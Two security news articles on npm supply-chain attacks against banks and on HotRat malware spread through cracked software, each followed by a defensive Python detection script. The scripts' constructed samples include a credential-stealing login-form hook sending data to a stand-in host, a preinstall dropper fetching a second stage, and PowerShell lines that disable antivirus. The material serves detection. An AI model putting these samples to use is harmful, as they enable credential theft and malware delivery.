Threat Actors Use Open-Source Software Supply Chain TTP to Target Banking Sector
- Written by Shipra Sanganeria Cybersecurity & Tech Writer
Researchers at Checkmarx, a US-based application security company, have documented what they describe as the first known open-source software (OSS) supply chain attacks aimed specifically at the banking sector. The attacks were identified in the first half of 2023.
In an open-source software supply chain attack, the attacker does not breach the target's network directly; instead, they publish or tamper with an open-source component that the target's developers will pull in, so the malicious code is carried into the environment by the build and install process itself. The tactics, techniques, and procedures (TTP) are the concrete steps used to plant, deliver and execute that code.
The first incident is said to have occurred on the 5th and 7th of April, when the attacker uploaded packages to the NPM registry. The packages carried a preinstall script, so the infection chain started automatically as soon as a developer ran npm install.
Before doing anything else, the script identified the target's operating system (Windows, Linux or macOS) and decoded the matching encoded file bundled inside the NPM package. It then downloaded a second-stage payload from a Microsoft Azure CDN subdomain whose name incorporated the targeted bank's name. Using Azure served two purposes: the bank-like subdomain made the traffic look legitimate to anyone reviewing it, and because Azure is a widely used, trusted service, the host was unlikely to appear on a traditional deny list.
The second stage was Havoc, an open-source post-exploitation command and control framework that is known to evade standard endpoint defences such as Windows Defender. “Havoc’s ability [..] makes it a go-to option for threat actors, replacing legitimate toolkits such as Cobalt Strike, Sliver, and Brute Ratel.”
Checkmarx also noted that the contributor account behind the malicious packages was linked to a LinkedIn page of an individual impersonating an employee of the targeted bank.
In a separate, unrelated attack in February 2023, a different bank was targeted. Here the attackers uploaded a package to the NPM registry containing carefully crafted code that latched “onto a specific login form element, stealthily intercepting login data and then transmitting it to a remote location.” The code was found to be tailored to the target bank’s mobile login page.
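Both incidents share indicators that can be checked before a package is ever installed: an install-time lifecycle hook, OS-conditional decoding of an embedded blob, a second-stage download from a CDN host, and (for the February case) a submit handler on a login form paired with an outbound send. The following audit script is an added example written for this page, not Checkmarx's tooling or code from the packages described; the package manifests and JavaScript sources it scans are constructed to resemble the reported behaviour, and the CDN host list and regexes are heuristic assumptions, so a hit means "review this", not "malicious".

```python
"""Heuristic pre-install audit of an npm package manifest and its JS sources.

Flags the behaviours described in the two Checkmarx reports: install lifecycle
hooks, OS-conditional payload decoding, second-stage fetches from CDN hosts,
and login-form hooking with outbound exfiltration. All sample data below is
constructed for illustration and does not reproduce the real packages.
"""
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Deliberately broad patterns: a match is a review prompt, not a verdict.
PLATFORM_RE = re.compile(r"process\.platform|os\.platform\(|os\.type\(")
DECODE_RE = re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|atob\(")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
CDN_HOSTS = ("azureedge.net", "cloudfront.net", "storage.googleapis.com")  # assumption: hosts worth extra scrutiny
FORM_HOOK_RE = re.compile(r"addEventListener\(\s*['\"]submit['\"]|\.onsubmit\s*=")
CRED_READ_RE = re.compile(r"type=['\"]?password|\.value")
EXFIL_RE = re.compile(r"\bfetch\(|XMLHttpRequest|navigator\.sendBeacon|new Image\(")

SEVERITY_ORDER = ("none", "low", "medium", "high")


def audit_package(manifest, sources):
    """Return a list of (severity, message) findings.

    manifest: parsed package.json as a dict
    sources:  {relative path: file contents} for the package's JS files
    """
    findings = []
    scripts = manifest.get("scripts", {})
    hooked_files = set()
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            findings.append(("medium", f"lifecycle hook '{hook}': {scripts[hook]}"))
            # Remember which files the hook runs; hits in them weigh more.
            for tok in scripts[hook].split():
                if tok.endswith(".js"):
                    hooked_files.add(tok.lstrip("./"))

    for path, src in sources.items():
        in_hook = path in hooked_files
        where = f"{path} (runs at install)" if in_hook else path
        if PLATFORM_RE.search(src) and DECODE_RE.search(src):
            findings.append(("high" if in_hook else "medium",
                             f"OS-conditional payload decoding in {where}"))
        for host in URL_RE.findall(src):
            cdn = any(host.endswith(c) for c in CDN_HOSTS)
            findings.append(("high" if (in_hook or cdn) else "low",
                             f"remote fetch from {host} in {where}"))
        if FORM_HOOK_RE.search(src) and CRED_READ_RE.search(src) and EXFIL_RE.search(src):
            findings.append(("high", f"login-form hook with outbound send in {where}"))
    return findings


def max_severity(findings):
    """Highest severity present, or 'none' for a clean package."""
    return max((s for s, _ in findings), key=SEVERITY_ORDER.index, default="none")


# --- Constructed samples: one clean package and two modelled on the reported TTPs ---
CLEAN_PKG = {"name": "pad-left-ish", "version": "1.0.0", "scripts": {"test": "node test.js"}}
CLEAN_SRC = {"index.js": "module.exports = (s, n) => s.padStart(n);"}

DROPPER_PKG = {"name": "example-bank-utils", "version": "1.0.3",
               "scripts": {"preinstall": "node setup.js"}}
DROPPER_SRC = {"setup.js": """
const fs = require('fs');
const stage = { win32: 'a.bin', linux: 'b.bin', darwin: 'c.bin' }[process.platform];
const raw = fs.readFileSync(stage, 'utf8');
const blob = Buffer.from(raw, 'base64');
fetch('https://example-bank.azureedge.net/' + stage);  // constructed host, not the real one
"""}

GRABBER_PKG = {"name": "form-helper", "version": "2.1.0", "scripts": {}}
GRABBER_SRC = {"index.js": """
const form = document.querySelector('#mobile-login');
form.addEventListener('submit', () => {
  const u = form.querySelector('input[name=user]').value;
  const p = form.querySelector('input[type=password]').value;
  navigator.sendBeacon('https://collector.example/x', JSON.stringify({u, p}));
});
"""}

if __name__ == "__main__":
    for pkg, src in ((CLEAN_PKG, CLEAN_SRC), (DROPPER_PKG, DROPPER_SRC), (GRABBER_PKG, GRABBER_SRC)):
        findings = audit_package(pkg, src)
        print(f"{pkg['name']}: {max_severity(findings)}")
        for sev, msg in findings:
            print(f"  [{sev}] {msg}")
```

In a real pipeline the manifest and sources come from the unpacked tarball (`npm pack` then extract) of the exact version in the lockfile, before install. The cheapest control against the April chain is independent of any scanner: set `ignore-scripts=true` in the project's `.npmrc` so lifecycle hooks never run, and opt specific trusted packages back in.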
The researchers stated that once they notified the institutions concerned, the malicious packages were promptly removed. However, they expect attacks on the banking sector’s software supply chain to continue.
They further argued that “vulnerability scanning at the build level” alone is no longer effective, since a malicious install script has already run by the time a build-stage scanner looks at the code, and that organizations must “adopt a proactive, integrated security architecture, incorporating protective measures at every stage of the SDLC.”
HotRat: Hackers Exploit Pirated Software to Spread This New AsyncRAT Variant
- Written by Shipra Sanganeria Cybersecurity & Tech Writer
A new AsyncRAT variant named HotRat is being spread through cracked copies of popular system utilities, development tools and video games. Once deployed, the malware lets the attacker steal personal and sensitive information from the victim’s machine.
“HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and gaining access to or altering clipboard data,” Avast researchers said.
The cracked installers found online are bundled with a malicious AutoHotkey (AHK) script. That script drops and runs a PowerShell script which attempts to disable security products, establishes persistence on the system, and finally launches HotRat through a Visual Basic Script (VBS) loader.
“Since HotRat is run with admin privileges, it is very easy for attackers to make changes in security,” noted Avast. The deployment script has been observed attempting to disable or bypass most common antivirus products, including Avira, Windows Defender, AVG, Malwarebytes and McAfee.
HotRat is described as a comprehensive RAT: beyond stealthily extracting sensitive information and credentials, it can deploy additional malware. The researchers identified around 20 new commands, most of which execute .NET payloads delivered from the command and control (C2) server, which lets the operators add or change the malware’s functionality at will without redeploying it.
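The infection chain above (cracked installer, AutoHotkey, PowerShell tampering with antivirus, persistence, then a VBS loader) is visible in ordinary endpoint telemetry, and each stage is noisy on its own but strong in combination. The correlation script below is an added example written for this page, not Avast's detection logic; the one-JSON-object-per-line log format and its field names are invented, the sample events are constructed, and it assumes the PowerShell stage uses the Windows Defender cmdlets Set-MpPreference and Add-MpPreference (the article itself only says the script deactivates security solutions).

```python
"""Correlate constructed endpoint telemetry into the HotRat-style chain:
AutoHotkey -> PowerShell AV tampering -> persistence -> VBS loader.

Log format (one JSON object per line) and field names are invented for this
illustration; map them onto your own Sysmon/EDR schema.
"""
import json
import re
from collections import defaultdict

# Assumption: the PowerShell stage uses Defender's Set-/Add-MpPreference cmdlets.
AV_TAMPER_RE = re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w+", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.I)
VBS_RE = re.compile(r"\.vbs\b", re.I)

CHAIN = ("ahk_spawns_powershell", "av_tamper", "persistence", "vbs_loader")


def _image_name(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def stage_of(ev):
    """Return the chain stage a single event evidences, or None."""
    kind = ev.get("event")
    if kind == "process_create":
        parent = _image_name(ev.get("parent_image", ""))
        image = _image_name(ev.get("image", ""))
        cmd = ev.get("command_line", "")
        if parent.startswith("autohotkey") and image == "powershell.exe":
            return "ahk_spawns_powershell"
        if image in ("wscript.exe", "cscript.exe") and VBS_RE.search(cmd):
            return "vbs_loader"
        if image == "schtasks.exe" and "/create" in cmd.lower():
            return "persistence"
    elif kind == "script_block" and AV_TAMPER_RE.search(ev.get("script", "")):
        return "av_tamper"
    elif kind == "registry_set" and RUN_KEY_RE.search(ev.get("key", "")):
        return "persistence"
    return None


def correlate(lines, min_stages=3):
    """Group events by host; return {host: [stages in chain order]} for hosts
    showing at least min_stages distinct stages. Malformed lines are skipped."""
    seen = defaultdict(set)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # don't let one bad line stop the pipeline
        stage = stage_of(ev)
        if stage:
            seen[ev.get("host", "?")].add(stage)
    return {host: [s for s in CHAIN if s in stages]
            for host, stages in seen.items() if len(stages) >= min_stages}


# Constructed sample telemetry: WS01 shows the full chain, WS02 only a lone .vbs logon script.
SAMPLE_LOG = r"""
{"host": "WS01", "event": "process_create", "parent_image": "C:\\Users\\u\\Downloads\\Editor_crack.exe", "image": "C:\\Users\\u\\AppData\\Local\\Temp\\AutoHotkey.exe", "command_line": "AutoHotkey.exe setup.ahk"}
{"host": "WS01", "event": "process_create", "parent_image": "C:\\Users\\u\\AppData\\Local\\Temp\\AutoHotkey.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -w hidden -ep bypass -f stage.ps1"}
{"host": "WS01", "event": "script_block", "script": "Add-MpPreference -ExclusionPath $env:APPDATA; Set-MpPreference -DisableRealtimeMonitoring $true"}
{"host": "WS01", "event": "registry_set", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "value": "wscript.exe C:\\Users\\u\\AppData\\Roaming\\upd.vbs"}
{"host": "WS01", "event": "process_create", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\wscript.exe", "command_line": "wscript.exe C:\\Users\\u\\AppData\\Roaming\\upd.vbs"}
{"host": "WS02", "event": "script_block", "script": "Get-MpComputerStatus | Select RealTimeProtectionEnabled"}
{"host": "WS02", "event": "process_create", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cscript.exe", "command_line": "cscript.exe logon.vbs"}
not json at all
"""

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {' -> '.join(stages)}")
```

The threshold matters: a lone wscript.exe running a .vbs file (WS02) is routine in many estates, and Add-MpPreference exclusions are added legitimately by admins, so neither should page anyone by itself. Requiring three of the four stages on one host keeps the alert specific to the chain the researchers describe while tolerating a missing data source.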
The researchers noted that the malware has become more prevalent since mid-October 2022, with the majority of infections observed in South Asia, Eastern Europe, North America and Africa.
“Despite the known dangers, [..] irresistible temptation to acquire high-quality software at no cost persists, leading many people to download illegal software. [..] The spread of this malware happens through public repositories, with links being disseminated on social networks and forums,” noted the researchers.
Users should avoid dubious websites offering free software downloads and keep their security software up to date; note, though, that since the HotRat installer runs with admin privileges and actively tries to disable antivirus products, not running the cracked installer in the first place is the control that actually matters.